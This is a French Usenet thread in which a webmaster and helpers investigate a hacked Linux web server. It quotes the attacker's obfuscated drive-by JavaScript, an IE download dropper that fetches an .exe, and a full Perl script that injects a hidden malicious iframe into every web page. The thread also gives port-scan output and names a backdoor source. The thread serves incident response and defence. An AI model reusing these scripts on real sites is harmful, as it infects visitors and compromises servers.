Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

tbsoft ( probleme tres etrange )

0 views
Skip to first unread message

Xaero

unread,
Nov 30, 2004, 2:17:59 AM11/30/04
to
Bonjour,

Lorsque je consulte mon site web ( http://www.xaero-method.com )

avant d'afficher la page , ie indique qu'il ouvre d'abord cette page :

http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )

quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait
pas

j'ai tenté un tracert pour voir , tbsoft.org n'apparait pas , il y aurait
donc bien un probleme directement sur le serveur

j'ai regardé la conf d'apache , tout m'a l'air normal.

Je vous joint la liste des process qui tourne sur le serveur :

1 root 0.0 % Oct08 init
2 root 0.0 % Oct08 [keventd]
3 root 0.0 % Oct08 [ksoftirqd_CPU0]
8 root 0.0 % Oct08 [bdflush]
4 root 0.0 % Oct08 [kswapd]
5 root 0.0 % Oct08 [kscand/DMA]
6 root 0.1 % Oct08 [kscand/Normal]
7 root 0.0 % Oct08 [kscand/HighMem]
9 root 0.0 % Oct08 [kupdated]
10 root 0.0 % Oct08 [mdrecoveryd]
14 root 0.0 % Oct08 [kjournald]
71 root 0.0 % Oct08 [khubd]
2794 root 0.0 % Oct08 [kjournald]
3097 root 0.0 % Oct08 syslogd -m 0
3101 root 0.0 % Oct08 klogd -x
3119 rpc 0.0 % Oct08 [portmap]
3138 rpcuser 0.0 % Oct08 [rpc.statd]
3234 root 0.0 % Oct08 /usr/sbin/snmpd -s -l /dev/null -P
/var/run/snmpd -a
3244 root 0.0 % Oct08 /usr/sbin/snmptrapd -s -u /var/run/snmptrapd.pid
3254 named 0.0 % Oct08 [named]
3267 root 0.0 % Oct08 /usr/sbin/sshd
3281 root 0.0 % Oct08 xinetd -stayalive -pidfile /var/run/xinetd.pid
3293 root 0.0 % Oct08 /bin/sh
/usr/bin/safe_mysqld --defaults-file=/etc/my.cnf
3323 mysql 6.1 % Oct08 [mysqld]
3358 root 0.0 % Oct08 /usr/bin/spamd -d -c -a
3367 root 0.0 % Oct08 gpm -t imps2 -m /dev/mouse
3384 root 0.0 % Oct08 crond
3403 xfs 0.0 % Oct08 [xfs]
3421 daemon 0.0 % Oct08 [atd]
3438 root 0.0 % Oct08 /usr/local/apache/bin/httpd
3462 root 0.0 % Oct08 /usr/bin/perl /usr/libexec/usermin/miniserv.pl
/etc/usermin/miniserv.conf
3469 root 0.0 % Oct08 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
3472 root 0.0 % Oct08 /sbin/mingetty tty1
3473 root 0.0 % Oct08 /sbin/mingetty tty2
3474 root 0.0 % Oct08 /sbin/mingetty tty3
3475 root 0.0 % Oct08 /sbin/mingetty tty4
3476 root 0.0 % Oct08 /sbin/mingetty tty5
3477 root 0.0 % Oct08 /sbin/mingetty tty6
1684 root 0.0 % 00:00 [sendmail]
1695 smmsp 0.0 % 00:00 [sendmail]
14685 root 0.0 % 07:10 /usr/sbin/sshd
14690 root 0.0 % 07:10 -bash
14892 apache 0.5 % 07:13 [httpd]
14990 apache 0.0 % 07:15 [httpd]
14996 apache 0.0 % 07:15 [httpd]
15007 apache 0.5 % 07:15 [httpd]
15011 apache 0.0 % 07:15 [httpd]
15012 apache 0.0 % 07:15 [httpd]
15022 apache 0.0 % 07:15 [httpd]
15027 apache 0.2 % 07:15 [httpd]
15030 apache 0.1 % 07:15 [httpd]
15031 apache 0.0 % 07:15 [httpd]
15041 apache 0.0 % 07:15 [httpd]
15048 apache 0.4 % 07:15 [httpd]
15050 apache 0.1 % 07:15 [httpd]
15051 apache 0.0 % 07:15 [httpd]
15055 apache 0.0 % 07:15 [httpd]
15056 apache 0.0 % 07:15 [httpd]
15057 apache 0.0 % 07:15 [httpd]
15058 apache 0.0 % 07:15 [httpd]
15090 root 0.0 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15092 root 0.1 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15128 root 0.0 % 07:16 /usr/bin/perl /usr/libexec/webmin/miniserv.pl
/etc/webmin/miniserv.conf
15133 root 4.0 % 07:16 /usr/libexec/webmin/proc/index_search.cgi


je me suis rendu sur le site tbsoft.org et voila ce qui apparait dans le
source de la page :

<!-- ( j'ai commenté au cas où mais cela n'est pas présent à l'origine )


<script language="JScript">
document.write(unescape('%u003C%u006F%u0062%u006A%u0065%u0063%u0074%u0020%u0
00D%u000A%u000D%u000A%u0064%u0061%u0074%u0061%u003D%u0022%u0026%u0023%u0031%
u0030%u0039%u003B%u0026%u0023%u0031%u0031%u0035%u003B%u0026%u0023%u0034%u003
5%u003B%u0026%u0023%u0031%u0030%u0035%u003B%u0026%u0023%u0031%u0031%u0036%u0
03B%u0026%u0023%u0031%u0031%u0035%u003B%u0026%u0023%u0035%u0038%u003B%u0026%
u0023%u0031%u0030%u0039%u003B%u0026%u0023%u0031%u0030%u0034%u003B%u0026%u002
3%u0031%u0031%u0036%u003B%u0026%u0023%u0031%u0030%u0039%u003B%u0026%u0023%u0
031%u0030%u0038%u003B%u0026%u0023%u0035%u0038%u003B%u0026%u0023%u0031%u0030%
u0032%u003B%u0026%u0023%u0031%u0030%u0035%u003B%u006C%u0065%u003A%u002F%u002
F%u0043%u003A%u000D%u000A%u000D%u000A%u005C%u005C%u004D%u0041%u0049%u004E%u0
02E%u004D%u0048%u0054%u0021%u0068%u0074%u0074%u0070%u003A%u002F%u002F%u0074%
u0062%u0073%u006F%u0066%u0074%u002E%u006F%u0072%u0067%u002F%u002F%u0069%u006
E%u0064%u0065%u0078%u002E%u0063%u0068%u006D%u003A%u003A%u002F%u0031%u002E%u0
068%u0074%u006D%u006C%u0022%u0020%u0074%u0079%u0070%u0065%u003D%u0022%u0074%
u0065%u0078%u0074%u002F%u0078%u002D%u0073%u0063%u0072%u0069%u0070%u0074%u006
C%u0065%u0074%u0022%u003E%u003C%u002F%u006F%u0062%u006A%u0065%u0063%u0074%u0
03E'));document.close();
</script>

-->


ce site execute donc du code javascript chez toutes les personnes qui
visitent mon site !!!

je ne sais pas du tout ce que produit ce code ( à ce niveau , j'ai
crossposté sur fr.comp.lang.javascript )


( fu2 sur alt.fr.comp.securite )

merci beaucoup pour votre aide ...

--
Xaero,
Jeu en ligne Xm-jdr
http://www.xaero-method.com/jdr

Cedric Blancher

unread,
Nov 30, 2004, 2:25:12 AM11/30/04
to
Le Tue, 30 Nov 2004 07:17:59 +0000, Xaero a écrit :
> Lorsque je consulte mon site web ( http://www.xaero-method.com )
> avant d'afficher la page , ie indique qu'il ouvre d'abord cette page :
> http://tbsoft.org/index.php ( puis redirigé sur tbsoft.org/indexold.html )

Je n'ai pas ce comportement.

> quand je consulte un autre site ( au hasard google.fr ) , cela n'apparait
> pas

Strange... Ça me faisait penser à un spyware installé sur ta machine et
qui te chargerait des bannières.

Sinon, quand je vais sur tbsfot.org, je tombe sur
http://tbsoft.org/indexx.html, donc le code source est le suivant :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script language="javascript">function onDownloadDone(s)
{document.frames["d"].document.location="/scripts/fr.exe";} </script>
</head>
<body>
<IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe>
<script language="javascript">oDownload.startDownload("/jsk.jsp",
onDownloadDone);</script></IE:DOWNLOAD> </body>
</html>

Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.


--
Bientôt, Apple ne va plus que fournir les plans sous microfilms coincés
sur le proc : le but sera de les en déloger avant d'allumer la machine,
sinon ça fond ! Comme à Fort Boyard...
-+- SP in Guide du Macounet Pervers :The name is Bond, James Bond -+-

Xaero

unread,
Nov 30, 2004, 4:10:52 AM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 07:17:59 +0000, Xaero a écrit :
>> Lorsque je consulte mon site web ( http://www.xaero-method.com )
>> avant d'afficher la page , ie indique qu'il ouvre d'abord cette page
>> : http://tbsoft.org/index.php ( puis redirigé sur
>> tbsoft.org/indexold.html )
>
> Je n'ai pas ce comportement.

Oui , logique , je vais expliquer pourquoi plus loin ;)

>
>> quand je consulte un autre site ( au hasard google.fr ) , cela
>> n'apparait pas
>
> Strange... Ça me faisait penser à un spyware installé sur ta machine
> et qui te chargerait des bannières.

C'est ce à quoi j'ai pensé tout d'abord , c'est pour cela que j'ai consulté
d'autre site pour etre sur que ca ne venait pas de moi mais j'ai du nouveau
;)

j'ai remarqué que j'avais été infecté par un troyen ( qui utilise la
nouvelle faille de ie au niveau des iframe )

en examinant les pages du serveur , j'ai remarqué un autre detail , associé
à chaque page , il y a une iframe invisible ( avec height=0 et width=0 ) qui
pointe vers ... tdsoft.org ;)

ce qui m'inquiete c'est que toutes les pages php et html sans exceptions
comportent cette iframe , ce qui me fait penser à un defaçage , donc il y a
clairement un trou de sécu sur le serveur qui permet de modifier les pages
!! ( pourtant toutes les pages du serveur sont chmodés pour permettre
uniquement la modif quand on est root sur la machine )

La solution temporaire que j'ai trouvé est d'uploader les pages presentes
sur mon dur qui ne comportent pas cette iframe , voila pourquoi il n'y a pas
eu ce probleme sur la page principale puisque j'ai uploadé une ancienne page
qui ne comportait pas d'iframe , mais il ya enormement de pages ... bref ca
va me prendre un temps fou :/

>
> Sinon, quand je vais sur tbsfot.org, je tombe sur
> http://tbsoft.org/indexx.html, donc le code source est le suivant :
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html>
> <head>
> <script language="javascript">function onDownloadDone(s)
> {document.frames["d"].document.location="/scripts/fr.exe";}
> </script> </head>
> <body>
> <IE:DOWNLOAD id="oDownload" style=""><iframe name="d"></iframe>
> <script language="javascript">oDownload.startDownload("/jsk.jsp",
> onDownloadDone);</script></IE:DOWNLOAD> </body>
> </html>
>
> Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout
> approprié.

Je pense en fait que le serveur se fait le relais indirect d'un virus (
troyen ) , je penche pour celui ci :

http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=40234
(sokeven)

troyen qui utilise une faille d'internet explorer :
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=7065

ce que je ne comprends pas , c'est comment un troyen qui s'execute sur
windows peut etre implanté sur le serveur en sachant que l'os est linux
ou alors , on aurait juste modifié les pages du serveur à la volée
uniquement pour infecter non pas le serveur mais les visiteurs en
redirigeant les visiteurs vers ce site ( tbsoft ) .

le code javascript telechargerais donc le virus et si moi , je vois un autre
code c'est que je suis infecté ( donc je n'ai plus besoin de telecharger à
nouveau le virus ) ( probleme à mon niveau : secuser ne me detecte rien )

bref j'ai coupé apache en attendant , j'ai pas envie de me faire le relais
d'un troyen ... je vais uploader les pages.

par contre pour eviter que ca ne se reproduise , qqun aurait une idée de
comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe
part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en
apprendront peut etre plus ...

Cedric Blancher

unread,
Nov 30, 2004, 6:23:56 AM11/30/04
to
Le Tue, 30 Nov 2004 09:10:52 +0000, Xaero a écrit :
> par contre pour eviter que ca ne se reproduise , qqun aurait une idée de
> comment modifier des pages à la volée comme ça , il y a un trou de sécu qqe
> part sur le serveur mais j'avoue que je vois pas où , les logs apache m'en
> apprendront peut etre plus ...

Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.

Sinon, quelques remarques diverses suite à des tests faits depuis mon
dernier posts au p'tit déj...

Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité
corrigées depuis... Cf. :

http://www.apache.org/dist/httpd/CHANGES_1.3

phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
dois avouer que c'est amha la source probable de l'intrusion. Il faut
vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles
diverses (XSS, SQL injections, file injection, etc.)

PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis.
La dernière version stable est la 4.3.9. Laisser traîner des choses
comme ça n'est pas malin :

http://www.xaero-method.com/info

Surtout vu la configuration que ça affiche...

Sinon, dans les trucs rigolos :

http://www.xaero-method.com/mail/
http://www.xaero-method.com/test/


--
BOFH excuse #208:

Your mail is being routed through Germany ... and they're censoring us.

Cedric Blancher

unread,
Nov 30, 2004, 7:00:23 AM11/30/04
to
Le Tue, 30 Nov 2004 11:23:56 +0000, Cedric Blancher a écrit :
> PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis.

En parlant de failles sympathiques qui pourrait donner lieu à un deface,
on celle-ci :

http://www.securityfocus.com/bid/11190/info/


--
BOFH excuse #262:

Our POP server was kidnapped by a weasel.

Jean-Francois BILLAUD

unread,
Nov 30, 2004, 7:00:48 AM11/30/04
to
scripsit Cedric Blancher :

> Sinon, quelques remarques diverses suite à des tests faits depuis mon
> dernier posts au p'tit déj...
>
> Apache 1.3.29

> phpBB 2.0.6
> PHP 4.3.4

Et il n'y a pas de problème avec le mysql 3.23.49 ?


JFB

--
Zombie processes haunting the computer

Cedric Blancher

unread,
Nov 30, 2004, 7:22:54 AM11/30/04
to
Le Tue, 30 Nov 2004 12:00:48 +0000, Jean-Francois BILLAUD a écrit :
> Et il n'y a pas de problème avec le mysql 3.23.49 ?

Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement
qu'il ne serait pas accessible, et qu'à partir de là, il serait
difficile de générer le comportement constaté à partir de MySQL. En
fait, la machine est wide-open :

21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
199/tcp open smux
445/tcp filtered microsoft-ds
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt

Il y a quelques failles qui peuvent s'appliquer directement sur une
connexion au port TCP/3306.

Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND 92.1
vulnérable également, un ProFTPd 1.2.9 (en configuration par défaut)
pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas
creusé le serveur POP, ni le portmapper qui exporte des services en UDP,
ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...

Bref, y'a du monde... Mais je reste partisan d'une intrusion via le phpBB.


--
Vire [] (com2 usb) [] probleme [] xpertplay [] resserve les adresse
memoire [] reboot [] bios [] active [] windoz [] parametrage []
reservation de ressource [] reboot [] bios [] reset [] disable [] prie.
-+- MK in Guide du linuxien pervers - "Solution à un problème Windows"

Xaero

unread,
Nov 30, 2004, 10:11:29 AM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 12:00:48 +0000, Jean-Francois BILLAUD a écrit :
>> Et il n'y a pas de problème avec le mysql 3.23.49 ?
>
> Oh que si ! Mais je n'avais pas regardé le MySQL, supposant naïvement
> qu'il ne serait pas accessible, et qu'à partir de là, il serait
> difficile de générer le comportement constaté à partir de MySQL. En
> fait, la machine est wide-open :
>
> 21/tcp open ftp
> 22/tcp open ssh
> 25/tcp open smtp
> 53/tcp open domain
> 80/tcp open http
> 110/tcp open pop3
> 111/tcp open rpcbind
> 135/tcp filtered msrpc
> 199/tcp open smux
> 445/tcp filtered microsoft-ds
> 3306/tcp open mysql
> 10000/tcp open snet-sensor-mgmt
>
> Il y a quelques failles qui peuvent s'appliquer directement sur une
> connexion au port TCP/3306.

mais si je forme le port21 , comment accepter à mon ftp par exemple ?
de meme pour le port 80 , 110,22 etc ... , si je les ferme , impossible
d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur non
?
y aurait il une solution ?
( je precise que je n'ai pas d'accé physique à la machine qui est sur
paris )

>
> Sinon, on a un Sendmail 8.12.8 avec quelques failles aussi, un BIND
> 92.1 vulnérable également, un ProFTPd 1.2.9 (en configuration par
> défaut)
> pas à jour et un OpenSSH 3.5p1. avec des failles mineures. Je n'ai pas
> creusé le serveur POP, ni le portmapper qui exporte des services en
> UDP, ni le multiplex SNMP, ni le Webmin sur le port TCP/10000...
>
> Bref, y'a du monde... Mais je reste partisan d'une intrusion via le
> phpBB.

je vois ... par contre pour webmin , je l'ai mis à jour recemment et je suis
sur d'avoir la derniere version stable.

en fait , c'est un peu un avertissement cette intrusion , je realise en
consultant le script pl utilisé pour le defacage que la personne aurait pu
tout effacer .. bref , si j'ai bien compris , je dois tout mettre à jour ...

cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver un
moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai
necessairement un chmod en 777 , y aurai t'il une solution à ce niveau car
le repertoire tmp a clairement joué un role dans l'attaque.

Xaero

unread,
Nov 30, 2004, 10:11:29 AM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 09:10:52 +0000, Xaero a écrit :
>> par contre pour eviter que ca ne se reproduise , qqun aurait une
>> idée de comment modifier des pages à la volée comme ça , il y a un
>> trou de sécu qqe part sur le serveur mais j'avoue que je vois pas où
>> , les logs apache m'en apprendront peut etre plus ...
>
> Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
> DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.

erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur ,
c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/

>
> Sinon, quelques remarques diverses suite à des tests faits depuis mon
> dernier posts au p'tit déj...
>
> Apache 1.3.29 n'est pas à jour, il y a 5 failles de sécurité
> corrigées depuis... Cf. :
>
> http://www.apache.org/dist/httpd/CHANGES_1.3

ok , c'est vrai qu'il faudrait que je mette à jour :(

>
> phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
> sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
> dois avouer que c'est amha la source probable de l'intrusion. Il faut
> vérifier les logs PHP. La BID SecurityFocus annonce une 20e de failles
> diverses (XSS, SQL injections, file injection, etc.)

bizarrement , les logs sont tres etrange , on dirait que la personne avait
directement accé au serveur , cette personne a balancé ses wget sans
probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur , le
premier wget est apparu comme ça à 23h47.
petite question : est ce qu'une commande wget balancée en ssh avec accé root
se retrouve dans le error_log ?

>
> PHP 4.3.4 n'est pas à jour, il y a aussi des failles corrigées depuis.
> La dernière version stable est la 4.3.9. Laisser traîner des choses
> comme ça n'est pas malin :
>
> http://www.xaero-method.com/info
>
> Surtout vu la configuration que ça affiche...

je le concede :/

arf :/

Cedric Blancher

unread,
Nov 30, 2004, 11:26:45 AM11/30/04
to
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
> mais si je forme le port21 , comment accepter à mon ftp par exemple ?

Tu peux utiliser sftp qui fourni en standard avec OpenSSH. Au moins, c'est
clean et ton mot de passe ne passe pas en clair.

> de meme pour le port 80, 110,22 etc ... , si je les ferme , impossible


> d'avoir un accé aux services en ecoute sur ses ports depuis l'exterieur
> non ?

Tout ce qui est service publics, oui, tu dois les avoir ouvert. Mais ce
qui est à ton usage propre, je le fermerais à l'extérieur et les
contacterait via une redirection de port SSH :

ssh -L 1110:127.0.0.1:110 ton_serveur

Te permet de contacter ton serveur, sur son interface de loopback, port
110 via le lien SSH lorsque tu te connectes à ton port local 1110. Donc
pas de POP qui traîne en clair sur le réseau. Certains clients de
messagerie (Evolution, Mutt, etc.) permettent de se s'autoconfigurer comme
ça.

> en fait , c'est un peu un avertissement cette intrusion , je realise en
> consultant le script pl utilisé pour le defacage que la personne aurait
> pu tout effacer .. bref , si j'ai bien compris , je dois tout mettre à
> jour ...

S'il a pris le compte root, c'est clair.



> cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien trouver
> un moyen pour qu'apache et mysql puisse ecrire dedans sans qu'il y ai
> necessairement un chmod en 777 , y aurai t'il une solution à ce niveau
> car le repertoire tmp a clairement joué un role dans l'attaque.

Le /tmp est _forcément en 777, puisque tout le monde doit pouvoir
lire et écrire dedans. Par contre, tu as loupé le sticky bit. En fait,
les droits sont 1777, ce qui empêche d'écrire sur les fichiers que les
autres ont crée. En outre, une utilisation consciencieuse de /tmp
génère des fichiers et répertoires aux droit plus restreints (0700 ou
0600 selon le cas). Mais de toute manière, si le gars est root, tes
droits ne servent plus trop à grand chose...


--
ML>finalement en plus du pitbull il faut rajouter l'humilité
Mais d'oû qu'ils sortent tous comme ça ?
C'est une cuvée spéciale Noël ?
-+- MG in : GNU - Ya pas que la dinde qui est en avance -+-

Cedric Blancher

unread,
Nov 30, 2004, 11:33:33 AM11/30/04
to
Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
>> Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
>> DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.
> erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns , j'ai
> pataugé et j'ai un peu laché l'affaire , à la base m'occuper d'un serveur ,
> c'est pas du tout mon domaine donc j'ai un peu fait comme j'ai pu :/

Toi, tu t'occupes de ton domaine. Par contre, ton hébergeur, lui,
s'occupe de la classe d'IP, et il peut associer à ton IP un nom pour
qu'on puisse faire une requête DNS sur l'IP. c'est ça un enregistrement
inverse (reverse DNS). Tu dois lui demander de le mettre en place.

> ok , c'est vrai qu'il faudrait que je mette à jour :(

Bah ouais...

> bizarrement , les logs sont tres etrange , on dirait que la personne
> avait directement accé au serveur , cette personne a balancé ses wget
> sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune erreur
> , le premier wget est apparu comme ça à 23h47. petite question : est
> ce qu'une commande wget balancée en ssh avec accé root se retrouve
> dans le error_log ?

Ton mec a réussi à chopper un shell root sur ta machine, c'est un fait.
La question est de savoir comment. Donc tu dois regarder tes logs sur les
heures précédents ces premières traces.
Si le mec est passé par ton phpBB, Apache n'y verra rien à redire.
Cherche un peu sur ta machine la trace de scripts PHP bizarres (genre qui
contiennent un appel de system() par exemple) et des binaires qui ne sont
clairement pas à toi ("nc" par exemple). Je ne peux pas prédire ce qui a
été fait, mais le fait d'uploader un binaire et un script PHP pour le
lancer est classique.
Regarde aussi du côté des connexions SSH (auth.log), il y a des attaques
par dictionnaire qui tournent en ce moment. Si ton mot de passe root est
un peu faible, ou qu'un compte classique avec mot de passe faible ou par
défaut est présent, il est peut-être passé par là.
Ce que tu dois comprendre, c'est qu'une fois qu'il aura un accès shell à
ta machine, le pas à faire pour passer root n'est plus très fort,
surtout si ton kernel n'est pas à jour (nombreux local root via le kernel
sous Linux).

>> http://www.xaero-method.com/info
>> Surtout vu la configuration que ça affiche...
> je le concede :/

C'est un grand classique.


--
BOFH excuse #8:

static buildup

Xaero

unread,
Nov 30, 2004, 11:36:22 AM11/30/04
to
Bon,

j'ai analysé mon error_log

il y a eu une intrusion , en fait un simple fichier ecrit en perl de 1ko a
permis de modifier les pages à la volée

10 minutes avant l'attaque, des telechargements de fichier ont été effectué
depuis le serveur , l'ensemble des fichiers a été placé dans le repertoire
/tmp

ces fichier font tous 950ko et portent des noms du genre cd.8 cd.1 , en tout
il y en a plus de 100 !

ces fichiers ont été téléchargé depuis schwang-equestrian.co.uk depuis ce
repertoire :

http://schwang-equestrian.co.uk/cd

si je ne me trompe pas , pour avoir accé au repertoire /tmp , il faut
obligatoirement avoir un accé en ssh ou ftp à la machine non ?

Cedric Blancher

unread,
Nov 30, 2004, 12:07:14 PM11/30/04
to
Le Tue, 30 Nov 2004 16:36:22 +0000, Xaero a écrit :
> ces fichiers ont été téléchargé depuis schwang-equestrian.co.uk depuis ce
> repertoire :
> http://schwang-equestrian.co.uk/cd

Qui correspond à une backdoor de neuneu :

http://packetstormsecurity.nl/UNIX/penetration/rootkits/cbd.c.txt

> si je ne me trompe pas , pour avoir accé au repertoire /tmp , il faut
> obligatoirement avoir un accé en ssh ou ftp à la machine non ?

Même pas. Si on arrive à prendre le contrôle d'un process, on peut le
faire à travers lui.


--
BOFH excuse #4:

static from nylon underwear

Xaero

unread,
Nov 30, 2004, 12:10:34 PM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
>> mais si je forme le port21 , comment accepter à mon ftp par exemple ?
>
> Tu peux utiliser sftp qui fourni en standard avec OpenSSH. Au moins,
> c'est clean et ton mot de passe ne passe pas en clair.

en fait je lance ma session ssh et j'utilise la commande ftp ? ou il faut
installer qqe chose ?
j'ai deja utilisé la commande ftp mais uniquement pour me connecter à des
serveurs ftp distant , je vois pas bien comment transferer les fichiers de
mon dur vers mon ftp en passant par ssh :/

>
>> de meme pour le port 80, 110,22 etc ... , si je les ferme ,
>> impossible d'avoir un accé aux services en ecoute sur ses ports
>> depuis l'exterieur non ?
>
> Tout ce qui est service publics, oui, tu dois les avoir ouvert. Mais
> ce qui est à ton usage propre, je le fermerais à l'extérieur et les
> contacterait via une redirection de port SSH :
>
> ssh -L 1110:127.0.0.1:110 ton_serveur
>
> Te permet de contacter ton serveur, sur son interface de loopback,
> port 110 via le lien SSH lorsque tu te connectes à ton port local
> 1110. Donc pas de POP qui traîne en clair sur le réseau. Certains
> clients de messagerie (Evolution, Mutt, etc.) permettent de se
> s'autoconfigurer comme ça.

donc en fait à la place du port 110 , j'utilise le port 1110 , et ça marche
avec oe ;) ?

>
>> en fait , c'est un peu un avertissement cette intrusion , je realise
>> en consultant le script pl utilisé pour le defacage que la personne
>> aurait pu tout effacer .. bref , si j'ai bien compris , je dois tout
>> mettre à jour ...
>
> S'il a pris le compte root, c'est clair.

( j'ai changé le mot de pass root au cas où , j'ai mis des données numerique
, l'ancien n'en comportais pas )

en fait je ne sais pas , j'ai chopé le script perl utilisé pour le defacage
, je vais mettre le code ici :

#!/usr/bin/perl
$unix = 1;
$ins = "<iframe src='http://tbsoft.org/index.php' height=0
width=0></iframe>";
@indices =
('*home*.php','*index*.php','*index*.htm*','default*.htm*','page*.htm*','pag
e*.php','text*.htm*','menu*.htm*','text.html*');
$folder = '/usr/local/apache/htdocs' if ($unix == 1);
$tmpfolder = '/tmp' if ($unix == 1);
$tmpfolder = 'F:/temp' if ($unix == 0);
############################################################################
#############

@chars=('a'..'z','A'..'Z','0'..'9');

foreach $indices (@indices) {
########## $indices .= '*' if $indices !~ /\*/;
@flist = <$folder/$indices>;
@flist = (@flist, <$folder/*/$indices>);
@flist = (@flist, <$folder/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/*/*/*/*/$indices>);
@flist = (@flist, <$folder/*/*/*/*/*/*/*/*/*/*/$indices>);

foreach $flist (@flist) {

#print $flist; #debug

$old = $flist;
$index = $old.'_';
$index =~ s/^.*\///;
foreach (1..10) { $index .= $chars[rand @chars]; }
$new = "$tmpfolder/$index";
open (in, "<$old") or die "cannot open for read file: $old \n";
open (out, ">$new") or die "cannot open for write file: $new \n";

$inserted = 0;
while (<in>) {
if ($_ =~ /\<\/BODY\>/i) {
print out $ins."\n" if ($inserted == 0);
$inserted = 1;
}
print out $_;
}
print out $ins."\n" if ($inserted == 0);

close out;
close in;

system("mv", $new, $old) if ($unix == 1);
rename($new,$old) if ($unix == 0);
}
}


je suis pas expert en perl , mais d'aprés ce que je vois , le mec se sert du
fait quele dossier tmp soit en 777 pour creer des copies temporaires des
fichiers à defacer , il modifie ensuite ces fichiers depuis le dossier
temporaire (777) et fait un mv vers les repertoires de destinations , du
coup en theorie , il n'a pas besoin d'avoir les droits root pour faire ça ..

ce qui me fait dire qu'il n'avait sans doute pas les pleins pouvoirs , sinon
pourquoi s'embetter , il aurait pu modifier directement les fichiers sources
sans passer par des copies dans le repertoire tmp , non ?

n'empeche , c'est du beau boulot.

>
>> cependant , le /tmp/ en 777 m'inquiete un peu , j'aimerais bien
>> trouver un moyen pour qu'apache et mysql puisse ecrire dedans sans
>> qu'il y ai necessairement un chmod en 777 , y aurai t'il une
>> solution à ce niveau car le repertoire tmp a clairement joué un role
>> dans l'attaque.
>
> Le /tmp est _forcément en 777, puisque tout le monde doit pouvoir
> lire et écrire dedans. Par contre, tu as loupé le sticky bit. En fait,
> les droits sont 1777, ce qui empêche d'écrire sur les fichiers que les
> autres ont crée. En outre, une utilisation consciencieuse de /tmp
> génère des fichiers et répertoires aux droit plus restreints (0700 ou
> 0600 selon le cas). Mais de toute manière, si le gars est root, tes
> droits ne servent plus trop à grand chose...

oui en fait le dossier etait bien en 1777 ( petit oubli de ma part ) ...

finalement la question principale est : comment le script en perl a atteri
dans le repertoire tmp, un wget sans doute , ( au fait j'ai consulté le
error_log et les transfers des fichiers sont dedans , donc peut on suposer
que le wget a eu lieu par le biais d'apache ? )

Xaero

unread,
Nov 30, 2004, 12:10:34 PM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 15:11:29 +0000, Xaero a écrit :
>>> Déjà, juste une remarque comme ça, ton serveur Web n'a pas de
>>> reverse DNS. C'est cosmétique me diras-tu, mais dans l'absolu,
>>> c'est maaaal.
>> erf ... en fait ca consiste en quoi , j'avoue que au niveau des dns
>> , j'ai pataugé et j'ai un peu laché l'affaire , à la base m'occuper
